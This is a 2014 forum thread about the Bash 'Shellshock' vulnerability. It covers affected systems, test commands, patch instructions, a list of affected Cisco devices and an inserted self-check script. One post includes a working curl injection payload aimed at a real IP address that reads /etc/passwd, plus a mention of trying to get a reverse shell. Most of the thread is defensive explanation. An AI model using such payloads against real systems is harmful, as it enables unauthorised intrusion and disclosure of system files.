pufosul, posted September 27, 2014
After Heartbleed, a new exploit follows, apparently identified by the Red Hat team. From what I understand it is a badly written code problem. In short, with this exploit you can gain root access (a kind of admin) on a server running a version of Unix/Linux, so Mac users are affected too. With most web servers running on Apache/nginx and routers running a Linux version (OpenWrt, DD-WRT), things are pretty bad. I wonder whether Cisco and Juniper routers/switches are affected too.
Memento Mori
johnake, posted September 27, 2014
It should be noted that this exploit can only be triggered on systems running services or applications that let unauthorised users access/set environment variables remotely. Examples of vulnerable systems:
- Apache servers using CGI scripts written in Bash
- Certain DHCP clients
- OpenSSH servers using ForceCommand
- Vulnerable networking services that use Bash
More details here: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 and http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
What can we do in this case? How do we test the system for this vulnerability? Type this command in the shell:
env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
The part "echo Bash is vulnerable!" is the big hole. This is where a potential attacker can inject malicious code. So if, after running the command above, the output gives you something like:
Bash is vulnerable!
Bash Test
You're fucked! Just kidding! There is a patch (reportedly unfinished) but it fixes the problem. So update bash:
APT-GET: sudo apt-get update && sudo apt-get install --only-upgrade bash
YUM: sudo yum update bash
Regarding your question, pufosul, I think you have to ask Cisco.
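A self-check script that wraps the test above and also covers the follow-up CVE-2014-7169 (an added example, not from the posts or from any vendor; it assumes bash is on PATH and reports "unknown" otherwise):

```shell
#!/bin/sh
# Shellshock self-check: an added example, not taken from the thread.
# Each check prints "vulnerable", "patched" or "unknown" (no bash on PATH).

# CVE-2014-6271: an unpatched bash imports VAR as a function and runs the
# trailing "echo" while parsing it; a patched bash leaves VAR as plain text.
check_cve_2014_6271() {
    command -v bash >/dev/null 2>&1 || { echo unknown; return 0; }
    out=$(env VAR='() { :;}; echo VULN6271' bash -c 'echo probe' 2>/dev/null) || true
    case "$out" in
        *VULN6271*) echo vulnerable ;;
        *)          echo patched ;;
    esac
}

# CVE-2014-7169 (the incomplete first fix): the parser leaks a stray ">"
# into the next command, so "echo date" turns into "date > echo" and a
# file literally named "echo" appears. Run in a scratch directory and
# look for that file instead of trusting any printed output.
check_cve_2014_7169() {
    command -v bash >/dev/null 2>&1 || { echo unknown; return 0; }
    tmp=$(mktemp -d) || { echo unknown; return 0; }
    ( cd "$tmp" && env X='() { (a)=>\' bash -c 'echo date' ) >/dev/null 2>&1 || true
    if [ -f "$tmp/echo" ]; then echo vulnerable; else echo patched; fi
    rm -rf "$tmp"
}

shellshock_report() {
    printf 'bash: %s\n' "$(bash --version 2>/dev/null | head -n 1)"
    printf 'CVE-2014-6271: %s\n' "$(check_cve_2014_6271)"
    printf 'CVE-2014-7169: %s\n' "$(check_cve_2014_7169)"
}

shellshock_report
```

Run it after the apt-get/yum update above to confirm both results read "patched".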
pufosul, posted September 27, 2014
I tested on the servers at work. They have BASH 3.2, but it seems it is not affected. I tried to get a reverse shell.
It seems the following Cisco devices are affected:
Cisco VCS devices (x7 and x8)
Cisco MXE 3500
Cisco DMM and SNS (assuming since running Red Hat Enterprise but unable to verify)
Jabber Guest
TCS Endpoints (6 or below have been verified, unable to verify 7 but assume vulnerable)
Cisco Conductor
They have already released signatures for IPSs.
A test against a site that has not been patched yet:
curl -i -X HEAD "http://85.114.145.159/" -A '() { :;}; echo "BashSmash: " $(</etc/passwd)'
HTTP/1.1 301 Moved Permanently
Date: Thu, 25 Sep 2014 08:08:31 GMT
Server: Apache
Location: http://www.nolis.de
Content-Type: text/html
Taken from: http://0x4139.com/bashsmash-explained-what-does-the-vulnerability-mean-and-how-does-that-affect-you/
And a guy who scanned the Internet for problematic servers.
I never thought the day would come when Windows Server would become more stable than Linux.
Memento Mori